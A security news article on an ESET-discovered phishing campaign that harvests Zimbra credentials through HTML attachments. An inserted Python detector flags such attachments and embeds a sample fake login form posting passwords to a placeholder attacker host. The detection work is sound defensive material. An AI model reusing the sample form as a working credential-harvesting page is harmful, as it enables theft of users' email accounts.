Highlights:

  • Potential victims receive emails from the campaign’s creators containing an HTML file with a phishing page.
  • A false Zimbra login page tailored to the targeted organization is shown when a user clicks on the attachment.

Zimbra account credentials are the target of a new, widely distributed phishing campaign, according to security researchers at ESET s.r.o.

The ongoing campaign, first discovered in April, is aimed at numerous small and medium-sized enterprises and government organizations. Users in Poland have been targeted the most so far, but targets have also been found in other European and Latin American nations, including Ukraine, Italy, France, and Ecuador.

Although the campaign is not technically complex, the researchers point out, it is still able to spread and successfully compromise organizations that use Zimbra Collaboration, a software suite that includes an email server and web client.

Potential victims receive emails from the campaign's operators with an HTML file attached; the attachment itself is the phishing page. The emails urge the recipient to open the attached file to resolve a supposed email server update, account deactivation, or similar problem.

A fake Zimbra login page tailored to the targeted organization is shown when the user opens the attachment. Victims who have been duped up to this point enter their credentials into the fake login form, which submits them to a server under the attackers' control.

Viktor Šperka, an ESET researcher who discovered the campaign, stated, “Adversaries leverage the fact that HTML attachments contain legitimate code, with the only telltale element being a link pointing to the malicious host. In this manner, it is much easier to circumvent reputation-based anti-spam policies, especially compared with more prevalent phishing techniques, where a malicious link is directly placed in the email body.”
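The telltale Šperka describes, a self-contained HTML attachment whose only malicious element is the URL it submits to, is something a mail gateway or analyst can check for directly. The following is an added example, not ESET's or Zimbra's code: it parses an HTML attachment, collects every form `action`, and flags the file when a password field is present and a form posts to a host outside the organization's own domains. The sample attachment, the organization domain `example-org.com` and the collector hostname are constructed placeholders, not indicators from the campaign.

```python
"""Flag HTML e-mail attachments whose login form posts credentials off-domain."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of the kind of attachment the article describes: a Zimbra-styled
# login form whose action points at an attacker-controlled host. Both hostnames are
# placeholders invented for this example, not real indicators.
SAMPLE_ATTACHMENT = """
<html><head><title>Zimbra Web Client Sign In</title></head>
<body>
<img src="https://mail.example-org.com/img/logo.png">
<form method="post" action="https://collector.attacker-placeholder.invalid/login">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form>
<script src="https://mail.example-org.com/js/zimbra.js"></script>
</body></html>
"""


class FormTargetParser(HTMLParser):
    """Collect form targets, password fields and every referenced URL."""

    def __init__(self):
        super().__init__()
        self.form_actions = []      # values of <form action="...">
        self.has_password_field = False
        self.referenced_urls = []   # every src/href/action, for context

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        if tag == "input" and a.get("type", "").lower() == "password":
            self.has_password_field = True
        for key in ("src", "href", "action"):
            if a.get(key):
                self.referenced_urls.append(a[key])


def _host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def _is_trusted(host: str, trusted_domains: set) -> bool:
    return any(host == d or host.endswith("." + d) for d in trusted_domains)


def analyze_attachment(html: str, trusted_domains: set) -> dict:
    """Return the signals a triage rule would act on for one HTML attachment.

    Only absolute form actions are considered: an HTML file opened from disk with a
    relative action would post to file://, so credential exfiltration needs a full URL.
    """
    parser = FormTargetParser()
    parser.feed(html)
    parser.close()

    form_hosts = sorted({_host_of(u) for u in parser.form_actions if _host_of(u)})
    untrusted_form_hosts = [h for h in form_hosts if not _is_trusted(h, trusted_domains)]
    untrusted_ref_hosts = sorted(
        {_host_of(u) for u in parser.referenced_urls
         if _host_of(u) and not _is_trusted(_host_of(u), trusted_domains)}
    )
    return {
        "credential_form": parser.has_password_field,
        "form_hosts": form_hosts,
        "untrusted_form_hosts": untrusted_form_hosts,
        "untrusted_referenced_hosts": untrusted_ref_hosts,
        # The core rule: a password form that posts somewhere the organization does not own.
        "phishing_suspect": parser.has_password_field and bool(untrusted_form_hosts),
    }


if __name__ == "__main__":
    result = analyze_attachment(SAMPLE_ATTACHMENT, {"example-org.com"})
    for key, value in result.items():
        print(f"{key}: {value}")
```

Two caveats a practitioner should keep in mind. First, the `trusted_domains` set has to be the organization's real mail domains; a page that posts to a look-alike domain is exactly the case this rule is meant to catch, so the allow-list must not be widened to anything the page itself claims. Second, a form is not the only exfiltration path: a page can submit credentials from JavaScript, so any script loaded from a host outside the allow-list (reported here as `untrusted_referenced_hosts`) deserves a look even when no form action is flagged.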

The attackers then log in to the compromised account with the stolen credentials. When an administrator account is compromised, the attackers create new mailboxes, which are then used to send further phishing emails to other targets.

Roger Grimes, Data-Driven Defense Evangelist at KnowBe4 Inc., a cybersecurity company, said, “What’s interesting to me is that previous commenters are saying this isn’t a sophisticated phishing campaign. The initial phishing email redirects potential victims to a fake login page that contains their company’s logo and name. Both of these items significantly increase the chances that potential victims will be fooled and provide login credentials. I’m not sure this is the most sophisticated phishing campaign ever, but it’s not an unsophisticated one either.”

Grimes added that organizations running Zimbra need to take the security of those accounts seriously. “Step one is enabling phishing-resistant multifactor authentication on all Zimbra users and admins. If that had been done, these accounts, some of them admin, would not have been taken over by this latest phishing campaign,” he said.